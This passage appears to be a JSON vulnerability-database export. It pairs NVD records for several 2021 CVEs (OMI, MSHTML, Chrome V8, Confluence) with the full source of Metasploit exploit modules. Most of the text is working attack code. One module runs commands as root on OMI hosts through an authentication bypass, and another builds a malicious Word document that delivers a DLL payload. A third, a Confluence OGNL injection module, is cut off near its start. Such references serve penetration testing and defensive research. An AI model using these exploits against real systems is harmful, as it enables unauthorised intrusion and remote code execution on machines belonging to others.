"cpe:/a:microsoft:container_monitoring_solution:-", "cpe:/a:microsoft:log_analytics_agent:-"], "id": "CVE-2021-38647", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2021-38647", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:a:microsoft:azure_automation_update_management:-:*:*:*:*:*:*:*", "cpe:2.3:a:microsoft:azure_diagnostics_\$lad\$:-:*:*:*:*:*:*:*", "cpe:2.3:a:microsoft:azure_automation_state_configuration:-:*:*:*:*:*:*:*", "cpe:2.3:a:microsoft:log_analytics_agent:-:*:*:*:*:*:*:*", "cpe:2.3:a:microsoft:azure_sentinel:-:*:*:*:*:*:*:*", "cpe:2.3:a:microsoft:azure_open_management_infrastructure:-:*:*:*:*:*:*:*", "cpe:2.3:a:microsoft:azure_security_center:-:*:*:*:*:*:*:*", "cpe:2.3:a:microsoft:azure_stack_hub:-:*:*:*:*:*:*:*", "cpe:2.3:a:microsoft:container_monitoring_solution:-:*:*:*:*:*:*:*", "cpe:2.3:a:microsoft:system_center_operations_manager:-:*:*:*:*:*:*:*"]}, {"lastseen": "2023-05-23T15:42:50", "description": "Microsoft MSHTML Remote Code Execution Vulnerability", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2021-09-15T12:15:00", "type": "cve", "title": "CVE-2021-40444", "cwe": ["CWE-22"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-40444"], "modified": "2022-10-14T11:49:00", "cpe": ["cpe:/o:microsoft:windows_10:2004", "cpe:/o:microsoft:windows_10:1809", "cpe:/o:microsoft:windows_server_2019:-", "cpe:/o:microsoft:windows_10:21h1", "cpe:/o:microsoft:windows_8.1:-", "cpe:/o:microsoft:windows_rt_8.1:-", "cpe:/o:microsoft:windows_10:1607", "cpe:/o:microsoft:windows_server_2008:r2", "cpe:/o:microsoft:windows_10:-", "cpe:/o:microsoft:windows_10:20h2", "cpe:/o:microsoft:windows_server_2022:-", "cpe:/o:microsoft:windows_server_2008:-", "cpe:/o:microsoft:windows_server_2012:-", "cpe:/o:microsoft:windows_7:-", "cpe:/o:microsoft:windows_10:1909", "cpe:/o:microsoft:windows_server_2016:20h2", "cpe:/o:microsoft:windows_server_2016:2004", "cpe:/o:microsoft:windows_server_2016:-"], "id": "CVE-2021-40444", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2021-40444", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:o:microsoft:windows_server_2012:-:r2:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2019:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:1607:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_8.1:-:*:*:*:-:*:-:*", "cpe:2.3:o:microsoft:windows_server_2016:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2016:20h2:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:1909:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2012:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2008:r2:sp1:*:*:*:*:x64:*", "cpe:2.3:o:microsoft:windows_10:20h2:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2022:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:21h1:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2016:2004:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_rt_8.1:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:2004:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_7:-:sp1:*:*:-:*:-:*", "cpe:2.3:o:microsoft:windows_server_2008:-:sp2:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:1809:*:*:*:*:*:*:*"]}, {"lastseen": "2023-06-19T14:51:38", "description": "Out of bounds write in V8 in Google Chrome prior to 93.0.4577.82 allowed a remote attacker to potentially exploit heap corruption via a crafted HTML page.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2021-10-08T21:15:00", "type": "cve", "title": "CVE-2021-30632", "cwe": ["CWE-787"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-30632"], "modified": "2023-06-12T07:15:00", "cpe": ["cpe:/o:fedoraproject:fedora:33", "cpe:/o:fedoraproject:fedora:35"], "id": "CVE-2021-30632", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2021-30632", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:o:fedoraproject:fedora:35:*:*:*:*:*:*:*", "cpe:2.3:o:fedoraproject:fedora:33:*:*:*:*:*:*:*"]}, {"lastseen": "2023-05-27T14:30:47", "description": "In affected versions of Confluence Server and Data Center, an OGNL injection vulnerability exists that would allow an unauthenticated attacker to execute arbitrary code on a Confluence Server or Data Center instance. The affected versions are before version 6.13.23, from version 6.14.0 before 7.4.11, from version 7.5.0 before 7.11.6, and from version 7.12.0 before 7.12.5.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-08-30T07:15:00", "type": "cve", "title": "CVE-2021-26084", "cwe": ["CWE-74"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-26084"], "modified": "2022-06-10T14:26:00", "cpe": [], "id": "CVE-2021-26084", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2021-26084", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "cpe23": []}], "metasploit": [{"lastseen": "2022-11-02T03:02:15", "description": "By removing the authentication header, an attacker can issue an HTTP request to the OMI management endpoint that will cause it to execute an operating system command as the root user. This vulnerability was patched in OMI version 1.6.8-1 (released September 8th 2021).\n", "cvss3": {}, "published": "2021-10-25T21:36:55", "type": "metasploit", "title": "Microsoft OMI Management Interface Authentication Bypass", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2021-38647"], "modified": "2021-10-27T15:58:53", "id": "MSF:EXPLOIT-LINUX-MISC-CVE_2021_38647_OMIGOD-", "href": "https://www.rapid7.com/db/modules/exploit/linux/misc/cve_2021_38647_omigod/", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n\n Rank = ExcellentRanking\n\n prepend Msf::Exploit::Remote::AutoCheck\n include Msf::Exploit::Remote::HttpClient\n include Msf::Exploit::CmdStager\n\n XML_NS = { 'p' => 'http://schemas.dmtf.org/wbem/wscim/1/cim-schema/2/SCX_OperatingSystem' }.freeze\n\n def initialize(info = {})\n super(\n update_info(\n info,\n 'Name' => 'Microsoft OMI Management Interface Authentication Bypass',\n 'Description' => %q{\n By removing the authentication header, an attacker can issue an HTTP request to the OMI management endpoint\n that will cause it to execute an operating system command as the root user. This vulnerability was patched in\n OMI version 1.6.8-1 (released September 8th 2021).\n },\n 'Author' => [\n 'Nir Ohfeld', # vulnerability discovery & research\n 'Shir Tamari', # vulnerability discovery & research\n 'Spencer McIntyre', # metasploit module\n 'wvu' # vulnerability research\n ],\n 'References' => [\n ['CVE', '2021-38647'],\n ['URL', 'https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-38647'],\n ['URL', 'https://www.wiz.io/blog/omigod-critical-vulnerabilities-in-omi-azure'],\n ['URL', 'https://censys.io/blog/understanding-the-impact-of-omigod-cve-2021-38647/'],\n ['URL', 'https://attackerkb.com/topics/08O94gYdF1/cve-2021-38647']\n ],\n 'DisclosureDate' => '2021-09-14',\n 'License' => MSF_LICENSE,\n 'Platform' => ['linux', 'unix'],\n 'Arch' => [ARCH_CMD, ARCH_X86, ARCH_X64],\n 'Privileged' => true,\n 'Targets' => [\n [\n 'Unix Command',\n {\n 'Platform' => 'unix',\n 'Arch' => ARCH_CMD,\n 'Type' => :unix_cmd\n }\n ],\n [\n 'Linux Dropper',\n {\n 'Platform' => 'linux',\n 'Arch' => [ARCH_X86, ARCH_X64],\n 'Type' => :linux_dropper\n }\n ]\n ],\n 'DefaultTarget' => 1,\n 'DefaultOptions' => {\n 'RPORT' => 5985,\n 'SSL' => false,\n 'MeterpreterTryToFork' => true\n },\n 'Notes' => {\n 'AKA' => ['OMIGOD'],\n 'Stability' => [CRASH_SAFE],\n 'Reliability' => [REPEATABLE_SESSION],\n 'SideEffects' => [IOC_IN_LOGS, ARTIFACTS_ON_DISK]\n }\n )\n )\n\n register_options([\n OptString.new('TARGETURI', [true, 'Base path', '/wsman'])\n ])\n end\n\n def check\n http_res = send_command('id')\n return CheckCode::Unknown if http_res.nil?\n return CheckCode::Safe unless http_res.code == 200\n\n cmd_res = parse_response(http_res)\n return CheckCode::Unknown if cmd_res.nil? || cmd_res[:stdout] !~ /uid=(\\d+)\$\\S+\$ /\n\n return CheckCode::Vulnerable(\"Command executed as uid #{Regexp.last_match(1)}.\")\n end\n\n def exploit\n print_status(\"Executing #{target.name} for #{datastore['PAYLOAD']}\")\n\n case target['Type']\n when :unix_cmd\n result = execute_command(payload.encoded)\n if result\n print_status(result[:stdout]) unless result[:stdout].blank?\n print_error(result[:stderr]) unless result[:stderr].blank?\n end\n when :linux_dropper\n execute_cmdstager\n end\n end\n\n def execute_command(cmd, _opts = {})\n vprint_status(\"Executing command: #{cmd}\")\n res = send_command(cmd)\n\n unless res && res.code == 200\n fail_with(Failure::UnexpectedReply, \"Failed to execute command: #{cmd}\")\n end\n\n parse_response(res)\n end\n\n def parse_response(res)\n return nil unless res&.code == 200\n\n return_code = res.get_xml_document.at_xpath('//p:SCX_OperatingSystem_OUTPUT/p:ReturnCode', XML_NS)&.content.to_i\n unless return_code == 0\n print_error(\"Failed to execute command: #{cmd} (status: #{return_code})\")\n end\n\n {\n return_code: return_code,\n stdout: res.get_xml_document.at_xpath('//p:SCX_OperatingSystem_OUTPUT/p:StdOut', XML_NS)&.content,\n stderr: res.get_xml_document.at_xpath('//p:SCX_OperatingSystem_OUTPUT/p:StdErr', XML_NS)&.content\n }\n end\n\n def send_command(cmd)\n send_request_cgi(\n 'method' => 'POST',\n 'uri' => normalize_uri(target_uri.path),\n 'ctype' => 'text/xml;charset=UTF-8',\n 'data' => Nokogiri::XML(<<-ENVELOPE, nil, nil, Nokogiri::XML::ParseOptions::NOBLANKS).root.to_xml(indent: 0, save_with: 0)\n <s:Envelope xmlns:s=\"http://www.w3.org/2003/05/soap-envelope\" xmlns:a=\"http://schemas.xmlsoap.org/ws/2004/08/addressing\" xmlns:n=\"http://schemas.xmlsoap.org/ws/2004/09/enumeration\" xmlns:w=\"http://schemas.dmtf.org/wbem/wsman/1/wsman.xsd\" xmlns:xsi=\"http://www.w3.org/2001/XMLSchema\" xmlns:h=\"http://schemas.microsoft.com/wbem/wsman/1/windows/shell\" xmlns:p=\"http://schemas.microsoft.com/wbem/wsman/1/wsman.xsd\">\n <s:Header>\n <a:To>HTTP://127.0.0.1:5985/wsman/</a:To>\n <w:ResourceURI s:mustUnderstand=\"true\">http://schemas.dmtf.org/wbem/wscim/1/cim-schema/2/SCX_OperatingSystem</w:ResourceURI>\n <a:ReplyTo>\n <a:Address s:mustUnderstand=\"true\">http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous</a:Address>\n </a:ReplyTo>\n <a:Action>http://schemas.dmtf.org/wbem/wscim/1/cim-schema/2/SCX_OperatingSystem/ExecuteScript</a:Action>\n <w:MaxEnvelopeSize s:mustUnderstand=\"true\">102400</w:MaxEnvelopeSize>\n <a:MessageID>uuid:#{Faker::Internet.uuid}</a:MessageID>\n <w:OperationTimeout>PT1M30S</w:OperationTimeout>\n <w:Locale xml:lang=\"en-us\" s:mustUnderstand=\"false\"/>\n <p:DataLocale xml:lang=\"en-us\" s:mustUnderstand=\"false\"/>\n <w:OptionSet s:mustUnderstand=\"true\"/>\n <w:SelectorSet>\n <w:Selector Name=\"__cimnamespace\">root/scx</w:Selector>\n </w:SelectorSet>\n </s:Header>\n <s:Body>\n <p:ExecuteScript_INPUT xmlns:p=\"http://schemas.dmtf.org/wbem/wscim/1/cim-schema/2/SCX_OperatingSystem\">\n <p:Script>#{Rex::Text.encode_base64(cmd)}</p:Script>\n <p:Arguments/>\n <p:timeout>0</p:timeout>\n <p:b64encoded>true</p:b64encoded>\n </p:ExecuteScript_INPUT>\n </s:Body>\n </s:Envelope>\n ENVELOPE\n )\n end\nend\n", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/linux/misc/cve_2021_38647_omigod.rb", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-06-24T15:44:17", "description": "This module creates a malicious docx file that when opened in Word on a vulnerable Windows system will lead to code execution. This vulnerability exists because an attacker can craft a malicious ActiveX control to be used by a Microsoft Office document that hosts the browser rendering engine.\n", "cvss3": {}, "published": "2021-11-09T11:18:58", "type": "metasploit", "title": "Microsoft Office Word Malicious MSHTML RCE", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2021-40444"], "modified": "2021-12-08T22:22:44", "id": "MSF:EXPLOIT-WINDOWS-FILEFORMAT-WORD_MSHTML_RCE-", "href": "https://www.rapid7.com/db/modules/exploit/windows/fileformat/word_mshtml_rce/", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = ExcellentRanking\n\n include Msf::Exploit::FILEFORMAT\n include Msf::Exploit::Remote::HttpServer::HTML\n\n def initialize(info = {})\n super(\n update_info(\n info,\n 'Name' => 'Microsoft Office Word Malicious MSHTML RCE',\n 'Description' => %q{\n This module creates a malicious docx file that when opened in Word on a vulnerable Windows\n system will lead to code execution. This vulnerability exists because an attacker can\n craft a malicious ActiveX control to be used by a Microsoft Office document that hosts\n the browser rendering engine.\n },\n 'References' => [\n ['CVE', '2021-40444'],\n ['URL', 'https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-40444'],\n ['URL', 'https://www.sentinelone.com/blog/peeking-into-cve-2021-40444-ms-office-zero-day-vulnerability-exploited-in-the-wild/'],\n ['URL', 'http://download.microsoft.com/download/4/d/a/4da14f27-b4ef-4170-a6e6-5b1ef85b1baa/[ms-cab].pdf'],\n ['URL', 'https://github.com/lockedbyte/CVE-2021-40444/blob/master/REPRODUCE.md'],\n ['URL', 'https://github.com/klezVirus/CVE-2021-40444']\n ],\n 'Author' => [\n 'lockedbyte ', # Vulnerability discovery.\n 'klezVirus ', # References and PoC.\n 'thesunRider', # Official Metasploit module.\n 'mekhalleh (RAMELLA S\u00e9bastien)' # Zeop-CyberSecurity - code base contribution and refactoring.\n ],\n 'DisclosureDate' => '2021-09-23',\n 'License' => MSF_LICENSE,\n 'Privileged' => false,\n 'Platform' => 'win',\n 'Arch' => [ARCH_X64],\n 'Payload' => {\n 'DisableNops' => true\n },\n 'DefaultOptions' => {\n 'FILENAME' => 'msf.docx'\n },\n 'Targets' => [\n [\n 'Hosted', {}\n ]\n ],\n 'DefaultTarget' => 0,\n 'Notes' => {\n 'Stability' => [CRASH_SAFE],\n 'Reliability' => [UNRELIABLE_SESSION],\n 'SideEffects' => [IOC_IN_LOGS, ARTIFACTS_ON_DISK]\n }\n )\n )\n\n register_options([\n OptBool.new('OBFUSCATE', [true, 'Obfuscate JavaScript content.', true])\n ])\n register_advanced_options([\n OptPath.new('DocxTemplate', [ false, 'A DOCX file that will be used as a template to build the exploit.' ]),\n ])\n end\n\n def bin_to_hex(bstr)\n return(bstr.each_byte.map { |b| b.to_s(16).rjust(2, '0') }.join)\n end\n\n def cab_checksum(data, seed = \"\\x00\\x00\\x00\\x00\")\n checksum = seed\n\n bytes = ''\n data.chars.each_slice(4).map(&:join).each do |dword|\n if dword.length == 4\n checksum = checksum.unpack('C*').zip(dword.unpack('C*')).map { |a, b| a ^ b }.pack('C*')\n else\n bytes = dword\n end\n end\n checksum = checksum.reverse\n\n case (data.length % 4)\n when 3\n dword = \"\\x00#{bytes}\"\n when 2\n dword = \"\\x00\\x00#{bytes}\"\n when 1\n dword = \"\\x00\\x00\\x00#{bytes}\"\n else\n dword = \"\\x00\\x00\\x00\\x00\"\n end\n\n checksum = checksum.unpack('C*').zip(dword.unpack('C*')).map { |a, b| a ^ b }.pack('C*').reverse\n end\n\n # http://download.microsoft.com/download/4/d/a/4da14f27-b4ef-4170-a6e6-5b1ef85b1baa/[ms-cab].pdf\n def create_cab(data)\n cab_cfdata = ''\n filename = \"../#{File.basename(@my_resources.first)}.inf\"\n block_size = 32768\n struct_cffile = 0xd\n struct_cfheader = 0x30\n\n block_counter = 0\n data.chars.each_slice(block_size).map(&:join).each do |block|\n block_counter += 1\n\n seed = \"#{[block.length].pack('S')}#{[block.length].pack('S')}\"\n csum = cab_checksum(block, seed)\n\n vprint_status(\"Data block added w/ checksum: #{bin_to_hex(csum)}\")\n cab_cfdata << csum # uint32 {4} - Checksum\n cab_cfdata << [block.length].pack('S') # uint16 {2} - Compressed Data Length\n cab_cfdata << [block.length].pack('S') # uint16 {2} - Uncompressed Data Length\n cab_cfdata << block\n end\n\n cab_size = [\n struct_cfheader +\n struct_cffile +\n filename.length +\n cab_cfdata.length\n ].pack('L<')\n\n # CFHEADER (http://wiki.xentax.com/index.php/Microsoft_Cabinet_CAB)\n cab_header = \"\\x4D\\x53\\x43\\x46\" # uint32 {4} - Header (MSCF)\n cab_header << \"\\x00\\x00\\x00\\x00\" # uint32 {4} - Reserved (null)\n cab_header << cab_size # uint32 {4} - Archive Length\n cab_header << \"\\x00\\x00\\x00\\x00\" # uint32 {4} - Reserved (null)\n\n cab_header << \"\\x2C\\x00\\x00\\x00\" # uint32 {4} - Offset to the first CFFILE\n cab_header << \"\\x00\\x00\\x00\\x00\" # uint32 {4} - Reserved (null)\n cab_header << \"\\x03\" # byte {1} - Minor Version (3)\n cab_header << \"\\x01\" # byte {1} - Major Version (1)\n cab_header << \"\\x01\\x00\" # uint16 {2} - Number of Folders\n cab_header << \"\\x01\\x00\" # uint16 {2} - Number of Files\n cab_header << \"\\x00\\x00\" # uint16 {2} - Flags\n\n cab_header << \"\\xD2\\x04\" # uint16 {2} - Cabinet Set ID Number\n cab_header << \"\\x00\\x00\" # uint16 {2} - Sequential Number of this Cabinet file in a Set\n\n # CFFOLDER\n cab_header << [ # uint32 {4} - Offset to the first CFDATA in this Folder\n struct_cfheader +\n struct_cffile +\n filename.length\n ].pack('L<')\n cab_header << [block_counter].pack('S<') # uint16 {2} - Number of CFDATA blocks in this Folder\n cab_header << \"\\x00\\x00\" # uint16 {2} - Compression Format for each CFDATA in this Folder (1 = MSZIP)\n\n # increase file size to trigger vulnerability\n cab_header << [ # uint32 {4} - Uncompressed File Length (\"\\x02\\x00\\x5C\\x41\")\n data.length + 1073741824\n ].pack('L<')\n\n # set current date and time in the format of cab file\n date_time = Time.new\n date = [((date_time.year - 1980) << 9) + (date_time.month << 5) + date_time.day].pack('S')\n time = [(date_time.hour << 11) + (date_time.min << 5) + (date_time.sec / 2)].pack('S')\n\n # CFFILE\n cab_header << \"\\x00\\x00\\x00\\x00\" # uint32 {4} - Offset in the Uncompressed CFDATA for the Folder this file belongs to (relative to the start of the Uncompressed CFDATA for this Folder)\n cab_header << \"\\x00\\x00\" # uint16 {2} - Folder ID (starts at 0)\n cab_header << date # uint16 {2} - File Date (\\x5A\\x53)\n cab_header << time # uint16 {2} - File Time (\\xC3\\x5C)\n cab_header << \"\\x20\\x00\" # uint16 {2} - File Attributes\n cab_header << filename # byte {X} - Filename (ASCII)\n cab_header << \"\\x00\" # byte {1} - null Filename Terminator\n\n cab_stream = cab_header\n\n # CFDATA\n cab_stream << cab_cfdata\n end\n\n def generate_html\n uri = \"#{@proto}://#{datastore['SRVHOST']}:#{datastore['SRVPORT']}#{normalize_uri(@my_resources.first.to_s)}.cab\"\n inf = \"#{File.basename(@my_resources.first)}.inf\"\n\n file_path = ::File.join(::Msf::Config.data_directory, 'exploits', 'CVE-2021-40444', 'cve_2021_40444.js')\n js_content = ::File.binread(file_path)\n\n js_content.gsub!('REPLACE_INF', inf)\n js_content.gsub!('REPLACE_URI', uri)\n if datastore['OBFUSCATE']\n print_status('Obfuscate JavaScript content')\n\n js_content = Rex::Exploitation::JSObfu.new js_content\n js_content = js_content.obfuscate(memory_sensitive: false)\n end\n\n html = '<!DOCTYPE html><html><head><meta http-equiv=\"Expires\" content=\"-1\"><meta http-equiv=\"X-UA-Compatible\" content=\"IE=11\"></head><body><script>'\n html += js_content.to_s\n html += '</script></body></html>'\n html\n end\n\n def get_file_in_docx(fname)\n i = @docx.find_index { |item| item[:fname] == fname }\n\n unless i\n fail_with(Failure::NotFound, \"This template cannot be used because it is missing: #{fname}\")\n end\n\n @docx.fetch(i)[:data]\n end\n\n def get_template_path\n datastore['DocxTemplate'] || File.join(Msf::Config.data_directory, 'exploits', 'CVE-2021-40444', 'cve-2021-40444.docx')\n end\n\n def inject_docx\n document_xml = get_file_in_docx('word/document.xml')\n unless document_xml\n fail_with(Failure::NotFound, 'This template cannot be used because it is missing: word/document.xml')\n end\n\n document_xml_rels = get_file_in_docx('word/_rels/document.xml.rels')\n unless document_xml_rels\n fail_with(Failure::NotFound, 'This template cannot be used because it is missing: word/_rels/document.xml.rels')\n end\n\n uri = \"#{@proto}://#{datastore['SRVHOST']}:#{datastore['SRVPORT']}#{normalize_uri(@my_resources.first.to_s)}.html\"\n @docx.each do |entry|\n case entry[:fname]\n when 'word/document.xml'\n entry[:data] = document_xml.to_s.gsub!('TARGET_HERE', uri.to_s)\n when 'word/_rels/document.xml.rels'\n entry[:data] = document_xml_rels.to_s.gsub!('TARGET_HERE', \"mhtml:#{uri}!x-usc:#{uri}\")\n end\n end\n end\n\n def normalize_uri(*strs)\n new_str = strs * '/'\n\n new_str = new_str.gsub!('//', '/') while new_str.index('//')\n\n # makes sure there's a starting slash\n unless new_str[0, 1] == '/'\n new_str = '/' + new_str\n end\n\n new_str\n end\n\n def on_request_uri(cli, request)\n header_cab = {\n 'Access-Control-Allow-Origin' => '*',\n 'Access-Control-Allow-Methods' => 'GET, POST, OPTIONS',\n 'Cache-Control' => 'no-store, no-cache, must-revalidate',\n 'Content-Type' => 'application/octet-stream',\n 'Content-Disposition' => \"attachment; filename=#{File.basename(@my_resources.first)}.cab\"\n }\n\n header_html = {\n 'Access-Control-Allow-Origin' => '*',\n 'Access-Control-Allow-Methods' => 'GET, POST',\n 'Cache-Control' => 'no-store, no-cache, must-revalidate',\n 'Content-Type' => 'text/html; charset=UTF-8'\n }\n\n if request.method.eql? 'HEAD'\n if request.raw_uri.to_s.end_with? '.cab'\n send_response(cli, '', header_cab)\n else\n send_response(cli, '', header_html)\n end\n elsif request.method.eql? 'OPTIONS'\n response = create_response(501, 'Unsupported Method')\n response['Content-Type'] = 'text/html'\n response.body = ''\n\n cli.send_response(response)\n elsif request.raw_uri.to_s.end_with? '.html'\n print_status('Sending HTML Payload')\n\n send_response_html(cli, generate_html, header_html)\n elsif request.raw_uri.to_s.end_with? '.cab'\n print_status('Sending CAB Payload')\n\n send_response(cli, create_cab(@dll_payload), header_cab)\n end\n end\n\n def pack_docx\n @docx.each do |entry|\n if entry[:data].is_a?(Nokogiri::XML::Document)\n entry[:data] = entry[:data].to_s\n end\n end\n\n Msf::Util::EXE.to_zip(@docx)\n end\n\n def unpack_docx(template_path)\n document = []\n\n Zip::File.open(template_path) do |entries|\n entries.each do |entry|\n if entry.name.match(/\\.xml|\\.rels$/i)\n content = Nokogiri::XML(entry.get_input_stream.read) if entry.file?\n elsif entry.file?\n content = entry.get_input_stream.read\n end\n\n vprint_status(\"Parsing item from template: #{entry.name}\")\n\n document << { fname: entry.name, data: content }\n end\n end\n\n document\n end\n\n def primer\n print_status('CVE-2021-40444: Generate a malicious docx file')\n\n @proto = (datastore['SSL'] ? 'https' : 'http')\n if datastore['SRVHOST'] == '0.0.0.0'\n datastore['SRVHOST'] = Rex::Socket.source_address\n end\n\n template_path = get_template_path\n unless File.extname(template_path).match(/\\.docx$/i)\n fail_with(Failure::BadConfig, 'Template is not a docx file!')\n end\n\n print_status(\"Using template '#{template_path}'\")\n @docx = unpack_docx(template_path)\n\n print_status('Injecting payload in docx document')\n inject_docx\n\n print_status(\"Finalizing docx '#{datastore['FILENAME']}'\")\n file_create(pack_docx)\n\n @dll_payload = Msf::Util::EXE.to_win64pe_dll(\n framework,\n payload.encoded,\n {\n arch: payload.arch.first,\n mixed_mode: true,\n platform: 'win'\n }\n )\n end\nend\n", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/windows/fileformat/word_mshtml_rce.rb", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-06-24T15:44:26", "description": "This module exploits an OGNL injection in Atlassian Confluence's WebWork component to execute commands as the Tomcat user.\n", "cvss3": {}, "published": "2021-10-14T21:58:04", "type": "metasploit", "title": "Atlassian Confluence WebWork OGNL Injection", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2021-26084"], "modified": "2021-10-14T21:58:04", "id": "MSF:EXPLOIT-MULTI-HTTP-ATLASSIAN_CONFLUENCE_WEBWORK_OGNL_INJECTION-", "href": "https://www.rapid7.com/db/modules/exploit/multi/http/atlassian_confluence_webwork_ognl_injection/", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n\n Rank = ExcellentRanking\n\n prepend Msf::Exploit::Remote::AutoCheck\n include Msf::Exploit::Remote::HttpClient\n include Msf::Exploit::CmdStager\n include Msf::Exploit::Powershell\n include Msf::Module::Deprecated\n\n # Added Windows support\n moved_from 'exploit/linux/http/atlassian_confluence_webwork_ognl_injection'\n\n def initialize(info = {})\n super(\n update_info(\n info,\n 'Name' => 'Atlassian Confluence WebWork OGNL Injection',\n 'Description' => %q{\n This module exploits an OGNL injection in Atlassian Confluence's\n WebWork component to execute commands as the Tomcat user.\n },\n 'Author' => [\n 'Benny Jacob', # Discovery\n 'Jang', # Analysis\n 'wvu' # Analysis and exploit\n ],\n 'References' => [\n ['CVE', '2021-26084'],\n ['URL', 'https://confluence.atlassian.com/doc/confluence-security-advisory-2021-08-25-1077906215.html'],\n ['URL', 'https://jira.atlassian.com/browse/CONFSERVER-67940'],\n ['URL', 'https://attackerkb.com/topics/Eu74wdMbEL/cve-2021-26084-confluence-server-ognl-injection/rapid7-analysis'],\n ['URL', 'https://github.com/httpvoid/writeups/blob/main/Confluence-RCE.md'],\n 